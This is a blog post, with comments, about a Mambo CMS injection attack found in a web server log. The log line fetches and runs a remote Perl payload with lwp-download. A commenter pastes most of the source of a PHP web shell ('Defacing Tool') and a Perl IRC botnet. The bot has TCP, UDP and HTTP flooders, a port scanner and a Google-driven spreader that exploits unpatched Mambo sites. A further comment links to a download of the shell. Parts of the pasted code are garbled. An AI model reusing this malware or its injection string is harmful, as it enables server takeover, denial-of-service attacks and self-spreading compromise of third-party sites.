Mambo Exploit Payload

My thanks to Mr Peter Abraham for bringing this attack payload to my attention:

IP Address of attacker: 202.91.1XX.5
Sample log report including date and time stamp:

Request: newtimes.co.rw 202.91.1XX.5 – – [07/Feb/2006:00:00:24 -0600] “GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.domain.de/princo/tool.gif?&cmd=cd%20/tmp/;lwp-download%20http://domain.de/princo/sess3023_;perl%20sess3023_;rm%20-rf%20sess3023*?

Because this is something that was new to me, i asked Mr Abraham what the attack or exploit was. Looking at the log extract, it would seem to the uninitiated that the web visitor was merely browsing their hosted site.

“It is an injection attack where the attacker is trying to attack a Mambo application by injecting commands to fetch hack kits hosted elsewhere, and in the process gain control of the server / site being attacked.

If it helps, please see http://secunia.com/advisories/17622/ and http://www.dynamicnet.net/customer/h-sphere/security/articles/01_2006_go_tattle.htm http://secunia.com/advisories/17622/ deals with the security vulnerability for which this particular attack focused “I would have asked TechandSec to look into this, as I know his interest lies in security, but he is currently doing his thesis….

I would have asked to look into this, as I know his interest lies in security, but he is currently doing his thesis…. 

4 Responses to “Mambo Exploit Payload”

  1. Mambo’s support & development is not that good anymore. Most of the original Mambo developers left the Mambo scene and developed another CMS called Joomla.

  2. sorry for the late reply. i’ve been busy.

    first it calls tool.gif then download sess3023_ then execute it as perl sess3023_ because it’s a perl script. see the sess3023_ source below. that’s all for now. back to thesis again.

    inside tool.gif

    xterm at /usr/X11R6/bin/xterm, “;
    if (@file_exists(“/usr/bin/nc”)) $pro2=”nc at /usr/bin/nc, “;
    if (@file_exists(“/usr/bin/wget”)) $pro3=”wget at /usr/bin/wget, “;
    if (@file_exists(“/usr/bin/lynx”)) $pro4=”lynx at /usr/bin/lynx, “;
    if (@file_exists(“/usr/bin/gcc”)) $pro5=”gcc at /usr/bin/gcc, “;
    if (@file_exists(“/usr/bin/cc”)) $pro6=”cc at /usr/bin/cc “;
    $safe = @ini_get($safemode);
    if ($safe) $pro8=”safe_mode: YES, “; else $pro7=”safe_mode: NO, “;
    $pro8 = “PHP “.phpversion();
    $pro=$pro1.$pro2.$pro3.$pro4.$pro5.$pro6.$pro7.$pro8;
    $login=@posix_getuid(); $euid=@posix_geteuid(); $gid=@posix_getgid();
    $ip=@gethostbyname($_SERVER[‘HTTP_HOST’]);

    //Turns the ‘ls’ command more usefull, showing it as it looks in the shell
    if(strpos($cmd, ‘ls –‘) !==false) $cmd = str_replace(‘ls –‘, ‘ls -F –‘, $cmd);
    else if(strpos($cmd, ‘ls -‘) !==false) $cmd = str_replace(‘ls -‘, ‘ls -F’, $cmd);
    else if(strpos($cmd, ‘;ls’) !==false) $cmd = str_replace(‘;ls’, ‘;ls -F’, $cmd);
    else if(strpos($cmd, ‘; ls’) !==false) $cmd = str_replace(‘; ls’, ‘;ls -F’, $cmd);
    else if($cmd==’ls’) $cmd = “ls -F”;

    //If there are some ‘//’ in the cmd, its now removed
    if(strpos($chdir, ‘//’)!==false) $chdir = str_replace(‘//’, ‘/’, $chdir);
    ?>

    .campo{font-family: Verdana; color:white;font-size:11px;background-color:#414978;height:23px}
    .infop{font-family: verdana; font-size: 10px; color:#000000;}
    .infod{font-family: verdana; font-size: 10px; color:#414978;}
    .algod{font-family: verdana; font-size: 12px; font-weight: bold; color: #414978;}
    .titulod{font:Verdana; color:#414978; font-size:20px;}

    function inclVar(){var addr = location.href.substring(0,location.href.indexOf(‘?’)+1);var stri = location.href.substring(addr.length,location.href.length+1);inclvar = stri.substring(0,stri.indexOf(‘=’));}
    function enviaCMD(){inclVar();window.document.location.href=”+’?’+inclvar+’=’+”+’?&’+’cmd=’+window.document.formulario.cmd.value;return false;}
    function ativaFe(qual){inclVar();window.document.location.href=”+’?’+inclvar+’=’+”+’?&’+’fu=’+qual+’&cmd=’+window.document.formulario.cmd.value;return false;}
    function PHPget(){inclVar(); if(confirm(“O PHPget agora oferece uma lista pronta de urls,\nvc soh precisa escolher qual arquivo enviar para o servidor.\nDeseja utilizar isso? \nClique em Cancel para usar o PHPget normal, ou \nem Ok para usar esse novo recurso.”))goPreGet(); else{var c=prompt(“[ PHPget ] by r3v3ng4ns\nDigite a ORIGEM do arquivo (url) com ate 7Mb\n-Utilize caminho completo\n-Se for remoto, use http:// ou ftp://:”,”http://hostinganime.com/tool/nc.dat”);var dir = c.substring(0,c.lastIndexOf(‘/’)+1);var file = c.substring(dir.length,c.length+1);var p=prompt(“[ PHPget ] by r3v3ng4ns\nDigite o DESTINO do arquivo\n-Utilize caminho completo\n-O diretorio de destino deve ser writable”,”/”+file);window.open(”+’?’+inclvar+’=’+”+’?&’+’inclvar=’+inclvar+’&’+’c=’+c+’&p=’+p);}}
    function goPreGet(){inclVar();window.open(”+’?’+inclvar+’=’+”+’?&’+’inclvar=’+inclvar+’&’+’pre=1′);}
    function PHPwriter(){inclVar();var url=prompt(“[ PHPwriter ] by r3v3ng4ns\nDigite a URL do frame”,”http://hostinganime.com/tool/reven.htm”);var dir = url.substring(0,url.lastIndexOf(‘/’)+1);var file = url.substring(dir.length,url.length+1);var f=prompt(“[ PHPwriter ] by r3v3ng4ns\nDigite o Nome do arquivo a ser criado\n-Utilize caminho completo\n-O diretorio de destino deve ser writable”,”/”+file); t=prompt(“[ PHPwriter ] by r3v3ng4ns\nDigite o Title da pagina”,”[ r00ted team ] owned you :P – by r3v3ng4ns”);window.open(”+’?’+inclvar+’=’+”+’?&’+’inclvar=’+inclvar+’&’+’url=’+url+’&f=’+f+’&t=’+t);}
    function PHPf(){inclVar();var o=prompt(“[ PHPfilEditor ] by r3v3ng4ns\nDigite o nome do arquivo que deseja abrir\n-Utilize caminho completo\n-Abrir arquivos remotos, use http:// ou ftp://“,”/index.php”); var dir = o.substring(0,o.lastIndexOf(‘/’)+1);var file = o.substring(dir.length,o.length+1);window.open(‘?’+inclvar+’=?&inclvar=’+inclvar+’&o=’+o);}
    function safeMode(){inclVar();if (confirm (‘Deseja ativar o DTool com suporte a SafeMode?’)){window.document.location.href=”+’?’+inclvar+’=’+”+’?&';}else{ return false }}
    function list(turn){inclVar();if(turn==”off”)turn=0;else if(turn==”on”)turn=1; window.document.location.href=”+’?’+inclvar+’=’+”+’?&’+’list=’+turn+’&cmd=’+window.document.formulario.cmd.value;return false;}
    function overwrite(){inclVar();if(confirm(“O script tentara substituir todos os arquivos (do diretorio atual) que\nteem no nome a palavra chave especificada. Os arquivos serao\nsubstituidos pelo novo arquivo, especificado por voce.\n\nLembre-se!\n-Se for para substituir arquivos com a extensao jpg, utilize\ncomo palavra chave .jpg (inclusive o ponto!)\n-Utilize caminho completo para o novo arquivo, e se for remoto,\nutilize http:// e ftp://“)){keyw=prompt(“Digite a palavra chave”,”.jpg”);newf=prompt(“Digite a origem do arquivo que substituira”,”http://www.colegioparthenon.com.br/ingles/bins/revenmail.jpg”);if(confirm(“Se ocorrer um erro e o arquivo nao puder ser substituido, deseja\nque o script apague os arquivos e crie-os novamente com o novo conteudo?\nLembre-se de que para criar novos arquivos, o diretorio deve ser writable.”)){trydel=1}else{trydel=0} if(confirm(“Deseja substituir todos os arquivos do diretorio\n que contenham a palavra\n”+keyw+” no nome pelo novo arquivo de origem\n”+newf+” ?\nIsso pode levar um tempo, dependendo da quantidade de\narquivos e do tamanho do arquivo de origem.”)){window.location.href=’?’+inclvar+’=?&chdir=&list=1&’+’&keyw=’+keyw+’&newf=’+newf+’&trydel=’+trydel;return false;}}}

    [ Defacing Tool Pro v ] ?
    by r3v3ng4ns – revengans@gmail.com

    :
    user: uid() euid() gid()
    write permission:YES“; }else{ echo ” no”; } ?>
    server info:
    pro info: ip

    original path:
    current path:

    command
    ‘ style=”width:295; font-size:12px” class=”campo”>

    function focar(){window.document.formulario.cmd.focus();window.document.formulario.cmd.select();}

    array(“pipe”, “r”),1 => array(“pipe”, “w”),2 => array(“pipe”, “w”),)){
    $process = @proc_open(“$what”,$descpec,$pipes);
    if (is_resource($process)) {
    fwrite($pipes[0], “”);
    fclose($pipes[0]);

    while(!feof($pipes[2])) {
    $erro_retorno = fgets($pipes[2], 4096);
    if(!empty($erro_retorno)) echo $erro_retorno;//isso mostra tds os erros
    }
    fclose($pipes[2]);

    while(!feof($pipes[1])) {
    echo fgets($pipes[1], 4096);
    }
    fclose($pipes[1]);

    $ok_p_fecha = @proc_close($process);
    }else echo “It seems that this PHP version (“.phpversion().”) doesn’t support proc_open() function”;
    }else echo “This PHP version ($pro7) doesn’t have the proc_open() or this function is disabled by php.ini”;
    }

    $funE=”function_exists”;
    if($safe){$fe=”safemode”;$feshow=$fe;}
    elseif($funE(‘shell_exec’)){$fe=”shell”;$feshow=”shell_exec”;}
    elseif($funE(‘passthru’)){$fe=”passthru”;$feshow=$fe;}
    elseif($funE(‘system’)){$fe=”system”;$feshow=$fe;}
    elseif($funE(‘exec’)){$fe=”execc”;$feshow=”exec”;}
    elseif($funE(‘popen’)){$fe=”popenn”;$feshow=”popen”;}
    elseif($funE(‘proc_open’)){$fe=”procc”;$feshow=”proc_open”;}
    else {$fe=”nofunction”;$feshow=$fe;}
    if($fu!=”0″ or !empty($fu)){
    if($fu==1){$fe=”passthru”;$feshow=$fe;}
    if($fu==2){$fe=”system”;$feshow=$fe;}
    if($fu==3){$fe=”execc”;$feshow=”exec”;}
    if($fu==4){$fe=”popenn”;$feshow=”popen”;}
    if($fu==5){$fe=”shell”;$feshow=”shell_exec”;}
    if($fu==6){$fe=”procc”;$feshow=”proc_open”;}
    }
    $fe(“$cmd 2>&1″);
    $output=ob_get_contents();ob_end_clean();
    ?>

    use passthru()
    use system()
    use exec()
    use popen()
    use shell_exec()
    use proc_open()*new
    auto detect (default)
    ” class=”campo” onClick=”list(”)”>

    stdOut from $cmdShow\”, using $feshow()“;?>

    ; outros; cmds;\nMuda o diretorio para aquele especificado e permanece nele. Eh como se fosse o ‘cd’ numa shell, mas precisa ser o primeiro da linha. Os arquivos listados pelo filelist sao o do diretorio especificado ex: chdir /diretorio/sub/;pwd;ls\n\nPHPget, PHPwriter, Fileditor, File List e Overwrite\nfale com o r3v3ng4ns :P”);
    if (!empty($output)) echo str_replace(“>”, “>”, str_replace(”

    ——————————————————

    inside sess3023_

    #!/usr/bin/perl
    # This code is based on atrix (brazil) shellbot, somebody ripped all the credits, but its obviusly a rip.
    # so the original author is atrix. the spread perl code was developed by sirhot (i am almost sure) he is from morocco.
    # Note to David Jacoby: Expect a few improvements for the next release.
    #
    # The following comments are only left in the code to ridiculize this guy.
    # ————————————————————–
    # Morgan has hacked you!
    # Morgan Argentina, santiago del estero
    # http://irc.irc-argentina.org/x.conf
    # http://img521.imageshack.us/img521/3779/morganlammer6tu.png
    #
    # oper morgan {
    # class clients;
    # from {
    # userhost *@*;
    # };
    # password “soyuncapo”; // morgan si, eres-un-capo.
    # oper morgan2 {
    # class clients;
    # from {
    # userhost *@*;
    # };
    # password “thegod”; //morgan si, eres el-dios.
    # ———————————————————–
    my $processo = ‘kotfare';

    system(“kill -9 `ps ax |grep kotfare |grep -v grep|awk ‘{print $1;}’`”);

    # morgan the code that you need to rip ends here

    my $linas_max=’4′;
    my $sleep=’5′;
    my @adms=(“carlito”, “bill”, “Status”, “anonymous”);
    my @hostauth=(“127.0.01″,”127.0.0.2″,”127.0.0.2″);
    my @canais=(“#albateam”);
    my $nick=’albateam';
    my $ircname =’alba';
    chop (my $realname = ‘id’);
    $servidor=’albateam2.mooo.com’ unless $servidor;
    my $porta=’8351′;
    my $VERSAO = ‘0.5’;
    $SIG{‘INT’} = ‘IGNORE';
    $SIG{‘HUP’} = ‘IGNORE';
    $SIG{‘TERM’} = ‘IGNORE';
    $SIG{‘CHLD’} = ‘IGNORE';
    $SIG{‘PS’} = ‘IGNORE';
    use IO::Socket;
    use Socket;
    use IO::Select;
    chdir(“/”);
    $servidor=”$ARGV[0]” if $ARGV[0];
    $0=”$processo”.””x16;;
    my $pid=fork;
    exit if $pid;
    die “Problema com o fork: $!” unless defined($pid);

    our %irc_servers;
    our %DCC;
    my $dcc_sel = new IO::Select->new();

    $sel_cliente = IO::Select->new();
    sub sendraw {
    if ($#_ == ‘1’) {
    my $socket = $_[0];
    print $socket “$_[1]\n”;
    } else {
    print $IRC_cur_socket “$_[0]\n”;
    }
    }

    sub conectar {
    my $meunick = $_[0];
    my $servidor_con = $_[1];
    my $porta_con = $_[2];

    my $IRC_socket = IO::Socket::INET->new(Proto=>”tcp”, PeerAddr=>”$servidor_con”, PeerPort=>$porta_con) or return(1);
    if (defined($IRC_socket)) {
    $IRC_cur_socket = $IRC_socket;

    $IRC_socket->autoflush(1);
    $sel_cliente->add($IRC_socket);

    $irc_servers{$IRC_cur_socket}{‘host’} = “$servidor_con”;
    $irc_servers{$IRC_cur_socket}{‘porta’} = “$porta_con”;
    $irc_servers{$IRC_cur_socket}{‘nick’} = $meunick;
    $irc_servers{$IRC_cur_socket}{‘meuip’} = $IRC_socket->sockhost;
    nick(“$meunick”);
    sendraw(“USER $ircname “.$IRC_socket->sockhost.” $servidor_con :$realname”);
    sleep 1;
    }
    }
    my $line_temp;
    while( 1 ) {
    while (!(keys(%irc_servers))) { conectar(“$nick”, “$servidor”, “$porta”); }
    delete($irc_servers{”}) if (defined($irc_servers{”}));
    my @ready = $sel_cliente->can_read(0);
    next unless(@ready);
    foreach $fh (@ready) {
    $IRC_cur_socket = $fh;
    $meunick = $irc_servers{$IRC_cur_socket}{‘nick’};
    $nread = sysread($fh, $msg, 4096);
    if ($nread == 0) {
    $sel_cliente->remove($fh);
    $fh->close;
    delete($irc_servers{$fh});
    }
    @lines = split (/\n/, $msg);

    for(my $c=0; $cnew(PeerAddr => $hostip, PeerPort => $porta, Proto => ‘tcp’, Timeout => 4);
    if ($scansock) {
    push (@aberta, $porta);
    $scansock->close;
    }
    }

    if (@aberta) {
    sendraw($IRC_cur_socket, “PRIVMSG $printl :02[SCAN]02 Open port(s): @aberta”);
    } else {
    sendraw($IRC_cur_socket,”PRIVMSG $printl :02[SCAN]02 No open ports found”);
    }
    }
    if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
    sendraw($IRC_cur_socket, “PRIVMSG $printl :02[TCP]02 Attacking “.$1.”:”.$2.” for “.$3.” seconds.”);
    my $itime = time;
    my ($cur_time);
    $cur_time = time – $itime;
    while ($3>$cur_time){
    $cur_time = time – $itime;
    &tcpflooder(“$1″,”$2″,”$3″);
    }
    sendraw($IRC_cur_socket, “PRIVMSG $printl :02[TCP]02 Attack done “.$1.”:”.$2.”.”);
    }
    if ($funcarg =~ /^version/) {
    sendraw($IRC_cur_socket, “PRIVMSG $printl :02[VERSION]02 perlb0t ver “.$VERSAO);
    }
    if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
    sendraw($IRC_cur_socket, “PRIVMSG $printl :02[GOOGLE]02 Scanning for unpatched mambo for “.$1.” seconds.”);
    srand;
    my $itime = time;
    my ($cur_time);
    my ($exploited);
    $boturl=$2;
    $cur_time = time – $itime;$exploited = 0;
    while($1>$cur_time){
    $cur_time = time – $itime;
    @urls=fetch();
    foreach $url (@urls) {
    $cur_time = time – $itime;
    my $path = “”;my $file = “”;($path, $file) = $url =~ /^(.+)\/(.+)$/;
    $url =$path.”/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=$boturl?”;
    $page = http_query($url);
    $exploited = $exploited + 1;
    }
    }
    sendraw($IRC_cur_socket, “PRIVMSG $printl :02[GOOGLE]02 Exploited “.$exploited.” boxes in “.$1.” seconds.”);
    }
    if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
    sendraw($IRC_cur_socket, “PRIVMSG $printl :02[HTTP]02 Attacking “.$1.”:80 for “.$2.” seconds.”);
    my $itime = time;
    my ($cur_time);
    $cur_time = time – $itime;
    while ($2>$cur_time){
    $cur_time = time – $itime;
    my $socket = IO::Socket::INET->new(proto=>’tcp’, PeerAddr=>$1, PeerPort=>80);
    print $socket “GET / HTTP/1.1\r\nAccept: */*\r\nHost: “.$1.”\r\nConnection: Keep-Alive\r\n\r\n”;
    close($socket);
    }
    sendraw($IRC_cur_socket, “PRIVMSG $printl :02[HTTP]02 Attacking done “.$1.”.”);
    }
    if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
    sendraw($IRC_cur_socket, “PRIVMSG $printl :02[UDP]02 Attacking “.$1.” with “.$2.” Kb packets for “.$3.” seconds.”);
    my ($dtime, %pacotes) = udpflooder(“$1″, “$2″, “$3″);
    $dtime = 1 if $dtime == 0;
    my %bytes;
    $bytes{igmp} = $2 * $pacotes{igmp};
    $bytes{icmp} = $2 * $pacotes{icmp};
    $bytes{o} = $2 * $pacotes{o};
    $bytes{udp} = $2 * $pacotes{udp};
    $bytes{tcp} = $2 * $pacotes{tcp};
    sendraw($IRC_cur_socket, “PRIVMSG $printl :02[UDP]02 Sent “.int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024).” Kb in “.$dtime.” seconds to “.$1.”.”);
    }
    exit;
    }
    }
    }

    sub ircase {
    my ($kem, $printl, $case) = @_;

    if ($case =~ /^join (.*)/) {
    j(“$1″);
    }
    if ($case =~ /^part (.*)/) {
    p(“$1″);
    }
    if ($case =~ /^rejoin\s+(.*)/) {
    my $chan = $1;
    if ($chan =~ /^(\d+) (.*)/) {
    for (my $ca = 1; $ca &1 3>&1`;
    my $c=0;
    foreach my $linha (@resp) {
    $c++;
    chop $linha;
    sendraw($IRC_cur_socket, “PRIVMSG $printl :$linha”);
    if ($c == “$linas_max”) {
    $c=0;
    sleep $sleep;
    }
    }
    exit;
    }
    }
    }

    sub tcpflooder {
    my $itime = time;
    my ($cur_time);
    my ($ia,$pa,$proto,$j,$l,$t);
    $ia=inet_aton($_[0]);
    $pa=sockaddr_in($_[1],$ia);
    $ftime=$_[2];
    $proto=getprotobyname(‘tcp’);
    $j=0;$l=0;
    $cur_time = time – $itime;
    while ($l= $ftime;
    $t=”SOCK$l”;
    socket($t,PF_INET,SOCK_STREAM,$proto);
    connect($t,$pa)||$j–;
    $j++;$l++;
    }
    $l=0;
    while ($l= $ftime;
    $t=”SOCK$l”;
    shutdown($t,2);
    $l++;
    }
    }

    sub udpflooder {
    my $iaddr = inet_aton($_[0]);
    my $msg = ‘A’ x $_[1];
    my $ftime = $_[2];
    my $cp = 0;
    my (%pacotes);
    $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;

    socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
    socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
    socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
    socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
    return(undef) if $cp == 4;
    my $itime = time;
    my ($cur_time);
    while ( 1 ) {
    for (my $porta = 1; $porta = $ftime;
    send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
    send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
    send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
    send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;

    for (my $pc = 3; $pc = $ftime;
    socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
    send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
    }
    }
    last if $cur_time >= $ftime;
    }
    return($cur_time, %pacotes);
    }

    sub ctcp {
    return unless $#_ == 1;
    sendraw(“PRIVMSG $_[0] :01$_[1]01″);
    }
    sub msg {
    return unless $#_ == 1;
    sendraw(“PRIVMSG $_[0] :$_[1]”);
    }
    sub notice {
    return unless $#_ == 1;
    sendraw(“NOTICE $_[0] :$_[1]”);
    }
    sub op {
    return unless $#_ == 1;
    sendraw(“MODE $_[0] +o $_[1]”);
    }
    sub deop {
    return unless $#_ == 1;
    sendraw(“MODE $_[0] -o $_[1]”);
    }
    sub j { &join(@_); }
    sub join {
    return unless $#_ == 0;
    sendraw(“JOIN $_[0]”);
    }
    sub p { part(@_); }
    sub part {
    sendraw(“PART $_[0]”);
    }
    sub nick {
    return unless $#_ == 0;
    sendraw(“NICK $_[0]”);
    }
    sub quit {
    sendraw(“QUIT :$_[0]”);
    }

    # Spreader
    # this ‘spreader’ code isnot mine, i dont know who coded it.
    # update: well, i just fix0red this shit a bit.
    #

    sub fetch(){
    my $rnd=(int(rand(9999)));
    my $n= 80;
    if ($rnd\”]+)\”?>/g){
    if ($1 !~ m/google|cache|translate/){
    push (@lst,$1);
    }
    }
    return (@lst);
    }

    sub http_query($){
    my ($url) = @_;
    my $host=$url;
    my $query=$url;
    my $page=””;
    $host =~ s/href=\”?http:\/\///;
    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
    $query =~s/$host//;
    if ($query eq “”) {$query=”/”;};
    eval {
    local $SIG{ALRM} = sub { die “1”;};
    alarm 10;
    my $sock = IO::Socket::INET->new(PeerAddr=>”$host”,PeerPort=>”80″,Proto=>”tcp”) or return;
    print $sock “GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n”;
    my @r = ;
    $page=”@r”;
    alarm 0;
    close($sock);
    };
    return $page;

    }

  3. the tool.gif source code is missed up because it’s a .php code. sorry for the inconvenient.

    just download the tool.gif here http://www.microsofti.li/tool.gif

    or search google for “Defacing Tool 2.0 by r3v3ng4ns”

  4. kizi…

    Thanks for giving your ideas. I’d personally also like to mention that video games have been ever before evolving. Technology advances and revolutions have made it simpler to create genuine and enjoyable games. All these entertainment video games were…

Leave a Reply